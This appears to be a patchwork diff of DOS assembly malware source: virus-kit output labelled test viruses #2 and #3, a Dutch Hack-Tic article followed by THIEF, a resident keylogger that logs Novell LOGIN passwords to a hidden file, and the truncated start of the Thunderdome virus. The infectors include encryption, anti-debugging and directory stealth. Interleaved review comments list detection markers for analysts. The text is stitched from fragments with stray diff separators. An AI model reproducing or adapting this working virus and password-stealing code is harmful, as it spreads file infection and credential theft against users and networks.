signature db 'Test virus #1',0
|
||||
|
||||
get_extension:
|
||||
push ds ; find extension
|
||||
pop es
|
||||
mov di,dx
|
||||
mov cx,64
|
||||
mov al,'.'
|
||||
repnz scasb
|
||||
ret
|
||||
include bwme.asm
|
||||
|
||||
int_24:
|
||||
mov al,3 ; int 24 handler
|
||||
iret
|
||||
mutator dw 106h
|
||||
new_jump db 0E9h,0,0
|
||||
|
||||
virus_end:
|
||||
VIRUS_SIZE equ virus_end - virus_begin
|
||||
read_buffer db 28 dup (?) ; read buffer
|
||||
encrypt_buffer db VIRUS_SIZE dup (?) ; encryption buffer
|
||||
|
||||
end_heap:
|
||||
|
||||
MEM_SIZE equ end_heap - start
|
||||
|
||||
code ends
|
||||
end start
|
|
@ -0,0 +1,303 @@
|
|||
; test2.asm : Test virus #2
|
||||
; Created with Biological Warfare - Version 0.90á by MnemoniX
|
||||
|
||||
PING equ 0A6CFh
|
||||
INFECT equ 2
|
||||
MARKER equ 08080h
|
||||
|
||||
code segment
|
||||
org 100h
|
||||
assume cs:code,ds:code
|
||||
|
||||
start:
|
||||
db 0E9h,3,0 ; to virus
|
||||
host:
|
||||
db 0CDh,20h,0 ; host program
|
||||
virus_begin:
|
||||
push ds es
|
||||
|
||||
call $ + 3 ; BP is instruction ptr.
|
||||
pop bp
|
||||
sub bp,offset $ - 1
|
||||
|
||||
xor ax,ax ; mild anti-trace code
|
||||
mov es,ax ; kill interrupts 1 & 3
|
||||
mov di,6
|
||||
stosw
|
||||
mov di,14
|
||||
stosw
|
||||
|
||||
in al,21h ; lock out & reopen keyboard
|
||||
xor al,2
|
||||
out 21h,al
|
||||
xor al,2
|
||||
out 21h,al
|
||||
|
||||
push cs
|
||||
pop ds
|
||||
lea dx,[bp + offset new_DTA]
|
||||
mov ah,1Ah
|
||||
int 21h
|
||||
|
||||
mov byte ptr [bp + infections],0
|
||||
|
||||
push [bp + exe_cs]
|
||||
push [bp + exe_ip]
|
||||
push [bp + exe_ss]
|
||||
push [bp + exe_sp]
|
||||
call traverse
|
||||
|
||||
call activate
|
||||
|
||||
pop [bp + exe_sp]
|
||||
pop [bp + exe_ss]
|
||||
pop [bp + exe_ip]
|
||||
pop [bp + exe_cs]
|
||||
pop es ds
|
||||
mov dx,80h
|
||||
mov ah,1Ah
|
||||
int 21h
|
||||
|
||||
exe_exit:
|
||||
mov ax,ds ; fix up return address
|
||||
add ax,10h
|
||||
push ax
|
||||
add ax,cs:[bp + exe_cs]
|
||||
mov cs:[bp + return_cs],ax
|
||||
|
||||
mov ax,cs:[bp + exe_ip]
|
||||
mov cs:[bp + return_ip],ax
|
||||
|
||||
pop ax
|
||||
add ax,cs:[bp + exe_ss] ; restore stack
|
||||
cli
|
||||
mov ss,ax
|
||||
mov sp,cs:[bp + exe_sp]
|
||||
|
||||
call fix_regs ; fix up registers
|
||||
sti
|
||||
|
||||
db 0EAh ; back to host program
|
||||
return_ip dw 0
|
||||
return_cs dw 0
|
||||
|
||||
exe_cs dw -16 ; orig CS:IP
|
||||
exe_ip dw 103h
|
||||
exe_sp dw -2 ; orig SS:SP
|
||||
exe_ss dw -16
|
||||
|
||||
fix_regs:
|
||||
xor ax,ax
|
||||
cwd
|
||||
xor bx,bx
|
||||
mov si,100h
|
||||
xor di,di
|
||||
xor bp,bp
|
||||
ret
|
||||
|
||||
|
||||
traverse:
|
||||
sub sp,64 ; allocate stack space
|
||||
mov si,sp
|
||||
inc si
|
||||
mov ah,47h ; get current directory
|
||||
xor dl,dl
|
||||
push ds
|
||||
push ss
|
||||
pop ds
|
||||
int 21h
|
||||
|
||||
pop ds
|
||||
dec si
|
||||
mov byte ptr ss:[si],'\' ; fix directory
|
||||
|
||||
next_dir:
|
||||
call infect_dir
|
||||
|
||||
cmp byte ptr [bp + infections],INFECT
|
||||
je traverse_done
|
||||
|
||||
lea dx,[bp + outer] ; repeat in next dir up
|
||||
mov ah,3Bh
|
||||
int 21h
|
||||
jnc next_dir
|
||||
|
||||
traverse_done:
|
||||
add sp,64 ; reset
|
||||
mov dx,si
|
||||
push ds
|
||||
push ss
|
||||
pop ds
|
||||
mov ah,3Bh
|
||||
int 21h
|
||||
pop ds
|
||||
ret
|
||||
|
||||
infect_dir:
|
||||
mov ah,4Eh
|
||||
lea dx,[bp + find_me]
|
||||
int 21h
|
||||
jc infect_done
|
||||
|
||||
next_file:
|
||||
lea dx,[bp + new_DTA + 1Eh]
|
||||
call execute
|
||||
cmp byte ptr [bp + infections],INFECT
|
||||
je infect_done
|
||||
mov ah,4Fh
|
||||
int 21h
|
||||
jnc next_file
|
||||
|
||||
infect_done:
|
||||
ret
|
||||
execute:
|
||||
push si
|
||||
|
||||
mov ax,4300h ; change attributes
|
||||
int 21h
|
||||
|
||||
push cx dx ds
|
||||
xor cx,cx
|
||||
call set_attributes
|
||||
|
||||
mov ax,3D02h ; open file
|
||||
int 21h
|
||||
jc cant_open
|
||||
xchg bx,ax
|
||||
|
||||
mov ax,5700h ; save file date/time
|
||||
int 21h
|
||||
push cx dx
|
||||
mov ah,3Fh
|
||||
mov cx,28
|
||||
lea dx,[bp + read_buffer]
|
||||
int 21h
|
||||
|
||||
cmp word ptr [bp + read_buffer],'ZM'
|
||||
je infect_exe ; yes, infect as .EXE
|
||||
|
||||
jmp dont_infect
|
||||
|
||||
fix_date_time:
|
||||
pop dx cx
|
||||
mov ax,5701h ; restore file date/time
|
||||
int 21h
|
||||
|
||||
inc byte ptr [bp + infections]
|
||||
|
||||
close:
|
||||
pop ds dx cx ; restore attributes
|
||||
call set_attributes
|
||||
|
||||
mov ah,3Eh ; close file
|
||||
int 21h
|
||||
|
||||
cant_open:
|
||||
pop si
|
||||
ret
|
||||
|
||||
|
||||
set_attributes:
|
||||
mov ax,4301h
|
||||
int 21h
|
||||
ret
|
||||
|
||||
dont_infect:
|
||||
pop cx dx ; can't infect, skip
|
||||
jmp close
|
||||
|
||||
infect_exe:
|
||||
cmp word ptr [bp + read_buffer + 26],0
|
||||
jne dont_infect ; overlay, don't infect
|
||||
|
||||
cmp word ptr [bp + read_buffer + 16],MARKER
|
||||
je dont_infect ; infected already
|
||||
|
||||
les ax,dword ptr [bp + read_buffer + 20]
|
||||
mov [bp + exe_cs],es
|
||||
mov [bp + exe_ip],ax
|
||||
les ax,dword ptr [bp + read_buffer + 14]
|
||||
mov [bp + exe_ss],ax
|
||||
mov [bp + exe_sp],es
|
||||
mov word ptr [bp + read_buffer + 16],MARKER
|
||||
mov ax,4202h ; to end of file
|
||||
cwd
|
||||
xor cx,cx
|
||||
int 21h
|
||||
|
||||
push ax dx ; save file size
|
||||
|
||||
push bx
|
||||
mov cl,12 ; calculate offsets for CS
|
||||
shl dx,cl ; and IP
|
||||
mov bx,ax
|
||||
mov cl,4
|
||||
shr bx,cl
|
||||
add dx,bx
|
||||
and ax,15
|
||||
pop bx
|
||||
|
||||
sub dx,word ptr [bp + read_buffer + 8]
|
||||
mov word ptr [bp + read_buffer + 22],dx
|
||||
mov word ptr [bp + read_buffer + 20],ax
|
||||
add dx,100h
|
||||
mov word ptr [bp + read_buffer + 14],dx
|
||||
|
||||
pop dx ax ; calculate prog size
|
||||
|
||||
add ax,VIRUS_SIZE + 3
|
||||
adc dx,0
|
||||
mov cx,512 ; in pages
|
||||
div cx ; then save results
|
||||
inc ax
|
||||
mov word ptr [bp + read_buffer + 2],dx
|
||||
mov word ptr [bp + read_buffer + 4],ax
|
||||
|
||||
mov ah,40h
|
||||
mov cx,VIRUS_SIZE + 3
|
||||
lea dx,[bp + virus_begin]
|
||||
int 21h
|
||||
|
||||
|
||||
mov ax,4200h ; back to beginning
|
||||
cwd
|
||||
xor cx,cx
|
||||
int 21h
|
||||
|
||||
mov ah,40h ; and fix up header
|
||||
mov cx,28
|
||||
lea dx,[bp + read_buffer]
|
||||
int 21h
|
||||
jmp fix_date_time ; done
|
||||
|
||||
activate:
|
||||
; Insert your routine here
|
||||
ret
|
||||
|
||||
courtesy_of db '[BW]',0
|
||||
signature db 'Test virus #2',0
|
||||
|
||||
get_extension:
|
||||
push ds ; find extension
|
||||
pop es
|
||||
mov di,dx
|
||||
mov cx,64
|
||||
mov al,'.'
|
||||
repnz scasb
|
||||
ret
|
||||
|
||||
find_me db '*.EXE',0
|
||||
outer db '..',0
|
||||
|
||||
infections db 0
|
||||
virus_end:
|
||||
VIRUS_SIZE equ virus_end - virus_begin
|
||||
read_buffer db 28 dup (?) ; read buffer
|
||||
new_DTA db 128 dup(?)
|
||||
|
||||
end_heap:
|
||||
|
||||
MEM_SIZE equ end_heap - start
|
||||
|
||||
code ends
|
||||
end start
|
|
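Review bot: The file carries only the generator banner and no description of what an analyst should look for, so a header comment under the `; Created with Biological Warfare` line is missing. Every indicator is already visible in the hunk: the host is marked by writing MARKER (08080h) into the EXE header word at offset 16 and that same word is tested to skip already-marked files, at most INFECT (2) files per run are touched while the search climbs through `..`, zero words are stored at 0000:0006 and 0000:000E (the INT 1 / INT 3 vectors, per the existing comment) before any file is opened, and `activate` is an empty stub. A comment such as `; Direct-action .EXE infector; marker: header word 16 == 08080h; at most INFECT files per run, climbing '..'; zeroes INT 1/INT 3 vector words; activate is a stub` at the top of the file captures that.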
@ -0,0 +1,318 @@
|
|||
; test3.asm : Test virus #3
|
||||
; Created with Biological Warfare - Version 0.90á by MnemoniX
|
||||
|
||||
PING equ 0FA10h
|
||||
PONG equ 0B8D4h
|
||||
STAMP equ 31
|
||||
|
||||
code segment
|
||||
org 0
|
||||
assume cs:code,ds:code
|
||||
|
||||
start:
|
||||
db 0E9h,3,0 ; to virus
|
||||
host:
|
||||
db 0CDh,20h,0 ; host program
|
||||
virus_begin:
|
||||
|
||||
db 0BBh ; decryption module
|
||||
code_offset dw offset virus_code
|
||||
mov si,VIRUS_SIZE / 2 + 1
|
||||
db 0B8h
|
||||
cipher dw 0
|
||||
|
||||
decrypt:
|
||||
xor cs:[bx],ax
|
||||
add bx,2
|
||||
dec si
|
||||
jnz decrypt
|
||||
|
||||
|
||||
virus_code:
|
||||
push ds es
|
||||
|
||||
call $ + 3 ; BP is instruction ptr.
|
||||
pop bp
|
||||
sub bp,offset $ - 1
|
||||
|
||||
mov ax,PING ; test for residency
|
||||
int 21h
|
||||
cmp dx,PONG
|
||||
je installed
|
||||
|
||||
mov ax,es ; Get PSP
|
||||
dec ax
|
||||
mov ds,ax ; Get MCB
|
||||
|
||||
sub word ptr ds:[3],((MEM_SIZE+1023) / 1024) * 64
|
||||
sub word ptr ds:[12h],((MEM_SIZE+1023) / 1024) * 64
|
||||
mov es,word ptr ds:[12h]
|
||||
|
||||
push cs ; copy virus into memory
|
||||
pop ds
|
||||
xor di,di
|
||||
mov si,bp
|
||||
mov cx,(virus_end - start) / 2 + 1
|
||||
rep movsw
|
||||
|
||||
xor ax,ax ; capture interrupts
|
||||
mov ds,ax
|
||||
|
||||
mov si,21h * 4 ; get original int 21
|
||||
mov di,offset old_int_21
|
||||
movsw
|
||||
movsw
|
||||
|
||||
mov word ptr ds:[si - 4],offset new_int_21
|
||||
mov ds:[si - 2],es ; and set new int 21
|
||||
|
||||
installed:
|
||||
pop es ds ; restore segregs
|
||||
com_exit:
|
||||
lea si,[bp + host] ; restore host program
|
||||
mov di,100h
|
||||
push di
|
||||
movsw
|
||||
movsb
|
||||
|
||||
call fix_regs ; fix up registers
|
||||
ret ; and leave
|
||||
|
||||
fix_regs:
|
||||
xor ax,ax
|
||||
cwd
|
||||
xor bx,bx
|
||||
mov si,100h
|
||||
xor di,di
|
||||
xor bp,bp
|
||||
ret
|
||||
|
||||
; interrupt 21 handler
|
||||
int_21:
|
||||
pushf
|
||||
call dword ptr cs:[old_int_21]
|
||||
ret
|
||||
|
||||
new_int_21:
|
||||
cmp ax,PING ; residency test
|
||||
je ping_pong
|
||||
cmp ah,11h ; directory stealth
|
||||
je dir_stealth
|
||||
cmp ah,12h
|
||||
je dir_stealth
|
||||
cmp ah,4Eh ; directory stealth
|
||||
je dir_stealth_2
|
||||
cmp ah,4Fh
|
||||
je dir_stealth_2
|
||||
cmp ax,4B00h ; execute program
|
||||
jne int_21_exit
|
||||
jmp execute
|
||||
int_21_exit:
|
||||
db 0EAh ; never mind ...
|
||||
old_int_21 dd 0
|
||||
|
||||
ping_pong:
|
||||
mov dx,PONG
|
||||
iret
|
||||
|
||||
dir_stealth:
|
||||
call int_21 ; get dir entry
|
||||
test al,al
|
||||
js dir_stealth_done
|
||||
|
||||
push ax bx es
|
||||
mov ah,2Fh
|
||||
int 21h
|
||||
|
||||
cmp byte ptr es:[bx],-1 ; check for extended FCB
|
||||
jne no_ext_FCB
|
||||
add bx,7
|
||||
no_ext_FCB:
|
||||
mov ax,es:[bx + 17h] ; check for infection marker
|
||||
and al,31
|
||||
cmp al,STAMP
|
||||
jne dir_fixed
|
||||
|
||||
sub word ptr es:[bx + 1Dh],VIRUS_SIZE + 3
|
||||
sbb word ptr es:[bx + 1Fh],0
|
||||
dir_fixed:
|
||||
pop es bx ax
|
||||
dir_stealth_done:
|
||||
iret
|
||||
|
||||
dir_stealth_2:
|
||||
pushf
|
||||
call dword ptr cs:[old_int_21]
|
||||
jc dir_stealth_done_2
|
||||
|
||||
check_infect2:
|
||||
push ax bx es
|
||||
|
||||
mov ah,2Fh
|
||||
int 21h
|
||||
mov ax,es:[bx + 16h]
|
||||
and al,31 ; check timestamp
|
||||
cmp al,STAMP
|
||||
jne fixed_2
|
||||
|
||||
sub es:[bx + 1Ah],VIRUS_SIZE + 3
|
||||
sbb word ptr es:[bx + 1Ch],0
|
||||
|
||||
fixed_2:
|
||||
pop es bx ax
|
||||
clc ; clear carry
|
||||
dir_stealth_done_2:
|
||||
retf 2
|
||||
execute:
|
||||
push ax bx cx dx si di ds es
|
||||
|
||||
xor ax,ax ; critical error handler
|
||||
mov es,ax ; routine - catch int 24
|
||||
mov es:[24h * 4],offset int_24
|
||||
mov es:[24h * 4 + 2],cs
|
||||
|
||||
mov ax,4300h ; change attributes
|
||||
int 21h
|
||||
|
||||
push cx dx ds
|
||||
xor cx,cx
|
||||
call set_attributes
|
||||
|
||||
mov ax,3D02h ; open file
|
||||
int 21h
|
||||
jc cant_open
|
||||
xchg bx,ax
|
||||
|
||||
push cs ; CS = DS
|
||||
pop ds
|
||||
|
||||
mov ax,5700h ; save file date/time
|
||||
int 21h
|
||||
push cx dx
|
||||
mov ah,3Fh
|
||||
mov cx,28
|
||||
mov dx,offset read_buffer
|
||||
int 21h
|
||||
|
||||
cmp word ptr read_buffer,'ZM' ; .EXE?
|
||||
je dont_infect ; .EXE, skip
|
||||
|
||||
mov al,2 ; move to end of file
|
||||
call move_file_ptr
|
||||
|
||||
cmp dx,65279 - (VIRUS_SIZE + 3)
|
||||
ja dont_infect ; too big, don't infect
|
||||
|
||||
sub dx,VIRUS_SIZE + 3 ; check for previous infection
|
||||
cmp dx,word ptr read_buffer + 1
|
||||
je dont_infect
|
||||
|
||||
add dx,VIRUS_SIZE + 3
|
||||
mov word ptr new_jump + 1,dx
|
||||
|
||||
add dx,103h
|
||||
call encrypt_code ; encrypt virus
|
||||
|
||||
mov dx,offset read_buffer ; save original program head
|
||||
int 21h
|
||||
|
||||
mov ah,40h ; write virus to file
|
||||
mov cx,VIRUS_SIZE
|
||||
mov dx,offset encrypt_buffer
|
||||
int 21h
|
||||
|
||||
xor al,al ; back to beginning of file
|
||||
call move_file_ptr
|
||||
|
||||
mov dx,offset new_jump ; and write new jump
|
||||
int 21h
|
||||
|
||||
fix_date_time:
|
||||
pop dx cx
|
||||
and cl,-32 ; add time stamp
|
||||
or cl,STAMP
|
||||
mov ax,5701h ; restore file date/time
|
||||
int 21h
|
||||
|
||||
close:
|
||||
pop ds dx cx ; restore attributes
|
||||
call set_attributes
|
||||
|
||||
mov ah,3Eh ; close file
|
||||
int 21h
|
||||
|
||||
cant_open:
|
||||
pop es ds di si dx cx bx ax
|
||||
jmp int_21_exit ; leave
|
||||
|
||||
|
||||
set_attributes:
|
||||
mov ax,4301h
|
||||
int 21h
|
||||
ret
|
||||
|
||||
dont_infect:
|
||||
pop cx dx ; can't infect, skip
|
||||
jmp close
|
||||
|
||||
move_file_ptr:
|
||||
mov ah,42h ; move file pointer
|
||||
cwd
|
||||
xor cx,cx
|
||||
int 21h
|
||||
|
||||
mov dx,ax ; set up registers
|
||||
mov ah,40h
|
||||
mov cx,3
|
||||
ret
|
||||
|
||||
courtesy_of db '[BW]',0
|
||||
signature db 'Test virus #3',0
|
||||
|
||||
|
||||
encrypt_code:
|
||||
push ax cx
|
||||
|
||||
push dx
|
||||
xor ah,ah ; get time for random number
|
||||
int 1Ah
|
||||
|
||||
mov cipher,dx ; save encryption key
|
||||
pop cx
|
||||
add cx,virus_code - virus_begin
|
||||
mov code_offset,cx ; save code offset
|
||||
|
||||
push cs ; ES = CS
|
||||
pop es
|
||||
|
||||
mov si,offset virus_begin ; move decryption module
|
||||
mov di,offset encrypt_buffer
|
||||
mov cx,virus_code - virus_begin
|
||||
rep movsb
|
||||
|
||||
mov cx,VIRUS_SIZE / 2 + 1
|
||||
encrypt:
|
||||
lodsw ; encrypt virus code
|
||||
xor ax,dx
|
||||
stosw
|
||||
loop encrypt
|
||||
|
||||
pop cx ax
|
||||
ret
|
||||
|
||||
int_24:
|
||||
mov al,3 ; int 24 handler
|
||||
iret
|
||||
new_jump db 0E9h,0,0
|
||||
|
||||
virus_end:
|
||||
VIRUS_SIZE equ virus_end - virus_begin
|
||||
read_buffer db 28 dup (?) ; read buffer
|
||||
encrypt_buffer db VIRUS_SIZE dup (?) ; encryption buffer
|
||||
|
||||
end_heap:
|
||||
|
||||
MEM_SIZE equ end_heap - start
|
||||
|
||||
code ends
|
||||
end start
|
|
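Review bot: The infection marker is not documented anywhere in the file even though three places depend on it: `fix_date_time` forces the host timestamp's seconds field to STAMP (31), and both `dir_stealth` and `check_infect2` compare that field against STAMP to decide which directory entries to shrink by VIRUS_SIZE + 3. A DOS seconds field of 31 encodes 62 seconds, a value no legitimately written file carries, so this is the trait a scanner or clean-up tool keys on and it belongs in a header comment, e.g. `; marker: DOS time seconds field == STAMP (31, i.e. 62 s); the stealth handlers apply the same test`. The residency handshake (`AX = PING` answered with `DX = PONG`) and the fact that the decryptor prefix before `virus_code` is copied out unencrypted while the rest is XORed with a 16-bit key taken from the INT 1Ah tick count are the other analyst-relevant facts worth stating there.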
@ -0,0 +1,269 @@
|
|||
;redaktie van The Key, John D., Tx, Herman Acker, Peter Poelman, Paul en Rop.
|
||||
;Nadruk wordt door de redaktie toegestaan!
|
||||
;------------------------------------------------------------------------------
|
||||
;
|
||||
; Als je via een Local Area Network onder MS-DOS files wilt kunnen bewerken
|
||||
;kun je bijna niet om de Novell networksoftware heen. Of je nou op je werk of
|
||||
;op school met Novell werkt: je hebt altijd te weinig bevoegdheid op het
|
||||
;systeem. Hack-Tic helpt je door te dringen in het systeem met dit artikel van
|
||||
;een anonieme auteur.
|
||||
;
|
||||
; THIEF is een TSR (Terminate and Stay Resident; geheugen-resident) programma
|
||||
;voor de IBM-compatible, geschreven in 8086 machinetaal. Het probeert om
|
||||
;wachtwoorden voor het Novell PC Local Area Netwerk te stellen. De oorsprong
|
||||
;van THIEF ligt op een school met een bloeiende hack-cultuur: George Washington
|
||||
;High School in Denver, Colorado USA.
|
||||
; Deze school is meer dan goed voorzien van IBM micro's. Vijf lokalen van 30
|
||||
;computers hangen allemaal via een ethernet aan elkaar. Het netwerk draait
|
||||
;onder Novell. Vier van de vijf lokalen gebruiken boot-proms [geheugenchips op
|
||||
;de netwerk-interfacekaart. Zij zorgen ervoor dat er opgestart kan worden
|
||||
;zonder dat er een disk (of zelfs een drive(!) nodig is op de betreffende
|
||||
;machine.] voor het opstarten van de PC's. De vijfde ruimte bevat IBM PS/2
|
||||
;model 80's(!) met harddisks. De systeembeheerders en andere "power-users"
|
||||
;maken graag gebruik van deze machines. Deze machines "booten" vanaf hun eigen
|
||||
;hard-disks, zij gebruiken geen boot-proms.
|
||||
; Op een van deze computers werd THIEF voor het eerst gesignaleerd. THIEF
|
||||
;maakt namelijk gebruik van een zwakheid in de beveiliging tijdens de bootfase.
|
||||
;In de AUTOEXEC.BAT file werd een extra regel toegevoegd die een "verborgen"
|
||||
;programma op de bootschijf activeerde. Zodra er echter een programma met de
|
||||
;naam LOGIN wordt uitgevoerd komt THIEF tot leven en hij slaat alle
|
||||
;toetsaanslagen op in een (eveneens verborgen) file op de boot disk. De
|
||||
;onbevoegde kan later terugkomen en kijken wat zijn val gevangen heeft.
|
||||
; Voordat we het "metabolisme" van THIEF verder gaan ontleden eerst even de
|
||||
;zwakheden die deze hack mogelijk maken:
|
||||
; -Een boot-proces dat veranderd kan worden
|
||||
; -Fysieke toegang (door een onbevoegde) tot de computer
|
||||
; Beide zijn goed te verhelpen. Boot-proms en een slot op de deur en klaar is
|
||||
;Kees.
|
||||
; Terug naar het "metabolisme". Nogal verassend is dat het programma dezelfde
|
||||
;"hook" gebruikt als de Novell shell. Het grijpt de centrale toegang naar DOS:
|
||||
;interrupt 21h [ (hex) wordt door programma's gebruikt om een DOS functie aan te
|
||||
;roepen. De Novell-Netware shell onderschept deze stroom om zondig zelf op
|
||||
;bepaalde verzoeken te reageren. ]. Het onderschept alle aanroepen naar DOS.
|
||||
;Zodra een EXECute file call wordt gemaakt met de filename LOGIN worden alle
|
||||
;toetsaanslagen vastgelegd totdat het programma terugkeert naar DOS. Tijdens het
|
||||
;LOGIN process wordt het Novell wachtwoord ingetikt en dus is de hacker een
|
||||
;wachtwoord rijker. Het is allemaal nog iets te ingewikkeld: het programma had
|
||||
;ook gewoon op de speciale Novell inlog functieaanroep kunnen wachten.Maar ach,
|
||||
;zo werkt het ook.
|
||||
; Dit soort programma's zijn alles behalve nieuw. Ze zijn net zo oud als
|
||||
;wachtwoord-beveiliging. Bestudering van dit programma geeft meer inzicht in de
|
||||
;problematiek van LAN-beveiliging.
|
||||
; De toekomst zal zeker geheel nieuwe identificatietechnieken brengen. Net zo
|
||||
;zeker is dat zij begroet zullen worden door geduldige, enigszins doortrapte
|
||||
;genialiteit.
|
||||
;
|
||||
; Opmerking: THIEF werd door zijn maker ook wel eens GETIT genoemd. De maker
|
||||
;was gelukkig onvoorzichtig genoeg om de sourcecode te laten slingeren.
|
||||
;
|
||||
;
|
||||
; DE CODE VAN THIEF:
|
||||
;
|
||||
;
|
||||
cseg segment
|
||||
assume cs:cseg,ds:cseg
|
||||
|
||||
org 100h
|
||||
public oi21,ac,ob,fn,fh,flag,ni21,jtov,oc,lethro,wpwtf,exist,create,
|
||||
public cntr,lits,begin
|
||||
|
||||
.RADIX 16
|
||||
start:
|
||||
push cs
|
||||
push cs
|
||||
push cs
|
||||
pop ds
|
||||
pop es
|
||||
mov ax,0fffeh
|
||||
CLI
|
||||
pop ss
|
||||
mov sp,ax
|
||||
STI
|
||||
jmp begin
|
||||
oi21 dd ?
|
||||
ac dw 0
|
||||
ob dw 80h dup (?)
|
||||
buff2 db 80h dup (?)
|
||||
fn db 'c:\testing.tmp',0,' '
|
||||
search1 db 'LOGIN'
|
||||
foundf db 0
|
||||
fh dw 0
|
||||
flag db 0
|
||||
cntr dw 0
|
||||
|
||||
ni21:
|
||||
assume cs:cseg,ds:nothing,es:nothing
|
||||
cmp ax,4b00h
|
||||
je exec
|
||||
cmp foundf,0ffh
|
||||
jne nc
|
||||
cmp ah,8
|
||||
je oc
|
||||
cmp ah,7
|
||||
je oc
|
||||
|
||||
nc:
|
||||
push ax
|
||||
mov al,cs:flag
|
||||
not al
|
||||
cmp al,0
|
||||
jne jtov
|
||||
mov ax,cntr
|
||||
inc ax
|
||||
mov cntr,ax
|
||||
cmp ax,31h
|
||||
jb jtov
|
||||
xor ax,ax
|
||||
mov cntr,ax
|
||||
mov flag,al
|
||||
pop ax
|
||||
pushf
|
||||
call dword ptr [oi21]
|
||||
push ds
|
||||
push cs
|
||||
pop ds
|
||||
push ax
|
||||
push bx
|
||||
push cx
|
||||
push dx
|
||||
jmp short wpwtf
|
||||
|
||||
jtov:
|
||||
pop ax
|
||||
jmp dword ptr cs:[oi21]
|
||||
|
||||
exec: call scanfor
|
||||
jmp nc
|
||||
oc:
|
||||
|
||||
pushf
|
||||
call dword ptr cs:[oi21]
|
||||
assume ds:cseg
|
||||
push ds
|
||||
push cs
|
||||
pop ds
|
||||
push ax
|
||||
push bx
|
||||
push cx
|
||||
push dx
|
||||
mov bx,ac
|
||||
mov [bx],al
|
||||
inc bx
|
||||
mov [ac],bx
|
||||
cmp al,0dh
|
||||
jne lethro
|
||||
mov byte ptr [bx],0ah
|
||||
not cs:[flag]
|
||||
lethro:
|
||||
pop dx
|
||||
pop cx
|
||||
pop bx
|
||||
pop ax
|
||||
pop ds
|
||||
iret
|
||||
|
||||
scanfor:
|
||||
push ax
|
||||
push di
|
||||
push si
|
||||
push es
|
||||
push ds
|
||||
push cs
|
||||
push cs
|
||||
pop es
|
||||
mov si,dx
|
||||
mov di,offset buff2
|
||||
moveit:
|
||||
lodsb
|
||||
and al,0dfh
|
||||
stosb
|
||||
or al,al
|
||||
jnz moveit
|
||||
pop ds
|
||||
mov di,offset buff2
|
||||
look:
|
||||
push di
|
||||
mov si,offset search1
|
||||
mov cx,5
|
||||
repe cmpsb
|
||||
pop di
|
||||
or cx,cx
|
||||
jz foundit
|
||||
inc di
|
||||
cmp byte ptr [di+5],0
|
||||
je not_found
|
||||
jmp look
|
||||
not_found:
|
||||
xor ax,ax
|
||||
mov foundf,al
|
||||
jmp short endofsearch
|
||||
foundit:
|
||||
mov ax,0ffh
|
||||
mov foundf,al
|
||||
endofsearch:
|
||||
pop ds
|
||||
pop es
|
||||
pop si
|
||||
pop di
|
||||
pop ax
|
||||
ret
|
||||
|
||||
wpwtf:
|
||||
mov ax,3d02h
|
||||
mov dx,offset fn
|
||||
pushf
|
||||
call dword ptr [oi21]
|
||||
jnc exist
|
||||
cmp al,2
|
||||
je create
|
||||
jmp lethro
|
||||
create:
|
||||
mov ah,3ch
|
||||
mov dx,offset fn
|
||||
mov cx,02h+04h
|
||||
pushf
|
||||
call dword ptr [oi21]
|
||||
jnc exist
|
||||
jmp lethro
|
||||
exist:
|
||||
mov fh,ax
|
||||
mov bx,ax
|
||||
mov ax,4202h
|
||||
xor cx,cx
|
||||
xor dx,dx
|
||||
pushf
|
||||
call dword ptr [oi21]
|
||||
mov cx,[ac]
|
||||
mov dx,offset ob
|
||||
sub cx,dx
|
||||
mov [ac],dx
|
||||
inc cx
|
||||
mov bx,fh
|
||||
mov ah,40h
|
||||
pushf
|
||||
call dword ptr [oi21]
|
||||
mov ah,3eh
|
||||
mov bx,fh
|
||||
pushf
|
||||
call dword ptr [oi21]
|
||||
jmp lethro
|
||||
|
||||
lits db 90h
|
||||
begin:
|
||||
mov ax,offset ob
|
||||
mov [ac],ax
|
||||
mov ax,3521h
|
||||
int 21h
|
||||
mov di,offset oi21
|
||||
mov [di],bx
|
||||
mov [di+2],es
|
||||
mov dx,offset ni21
|
||||
push cs
|
||||
pop ds
|
||||
mov ax,2521h
|
||||
int 21h
|
||||
mov dx,offset lits
|
||||
int 27h
|
||||
cseg ends
|
||||
end start
|
||||
|
|
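Review bot: The Dutch article above the code explains the threat model and its countermeasures, but the listing itself has no analyst-facing comment, and its indicators are only recoverable by tracing `ni21` and `wpwtf`. The log file is `c:\testing.tmp`, created through function 3Ch with attribute `02h+04h` (hidden + system); capture is armed only when an EXEC (AX=4B00h) path contains `LOGIN` after the uppercase fold `and al,0dfh`; single-character reads (AH=07h/08h) are appended to `ob`; and the buffer is flushed to disk once a CR has been seen and a further 31h DOS calls have gone by. A header comment stating those four facts, placed above `cseg segment`, would let a reader confirm the article's description against the code directly.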
@ -0,0 +1,403 @@
|
|||
;
|
||||
; Thunderdome virus by John Tardy / TridenT
|
||||
;
|
||||
|
||||
Org 0h
|
||||
|
||||
decr: jmp Crypt
|
||||
db 'Carcass'
|
||||
Loopje DB 0e2h
|
||||
db 0fah
|
||||
DecrLen Equ $-Decr
|
||||
|
||||
Crypt: Push Ax
|
||||
call Get_Ofs
|
||||
Get_Ofs: pop Bp
|
||||
sub Bp,Get_Ofs
|
||||
|
||||
Mov Ah,2ah
|
||||
Int 21h
|
||||
Cmp Cx,1993
|
||||
Ja Makeya
|
||||
jb Installed
|
||||
Cmp Dh,10
|
||||
Jb installed
|
||||
|
||||
|
||||
Makeya: Mov Ax,0DEADh
|
||||
Int 21h
|
||||
Cmp Ax,0AAAAh
|
||||
Je Installed
|
||||
|
||||
mov ax,3521h
|
||||
int 21h
|
||||
mov word ptr cs:old21[bp],bx
|
||||
mov word ptr cs:old21[bp][2],es
|
||||
|
||||
mov ax,cs
|
||||
dec ax
|
||||
mov ds,ax
|
||||
cmp byte ptr ds:[0000],'Z'
|
||||
jne installed
|
||||
mov ax,word ptr ds:[0003]
|
||||
sub ax,ParLen
|
||||
jb installed
|
||||
mov word ptr ds:[0003],ax
|
||||
sub word ptr ds:[0012h],ParLen
|
||||
lea si,decr[bp]
|
||||
xor di,di
|
||||
mov es,ds:[12h]
|
||||
mov ds,cs
|
||||
mov cx,virlen
|
||||
rep movsb
|
||||
mov ax,2521h
|
||||
mov ds,es
|
||||
mov dx,offset new21
|
||||
int 21h
|
||||
Installed: Mov Di,100h
|
||||
Push Di
|
||||
Lea Si,Org_Prg[Bp]
|
||||
Push Cs
|
||||
Pop Ds
|
||||
Push Cs
|
||||
Pop Es
|
||||
Movsw
|
||||
Movsb
|
||||
Pop Bx
|
||||
Pop Ax
|
||||
Jmp Bx
|
||||
|
||||
Old21 dd 0
|
||||
|
||||
New21: cmp ax,0deadh
|
||||
jne chkfunc
|
||||
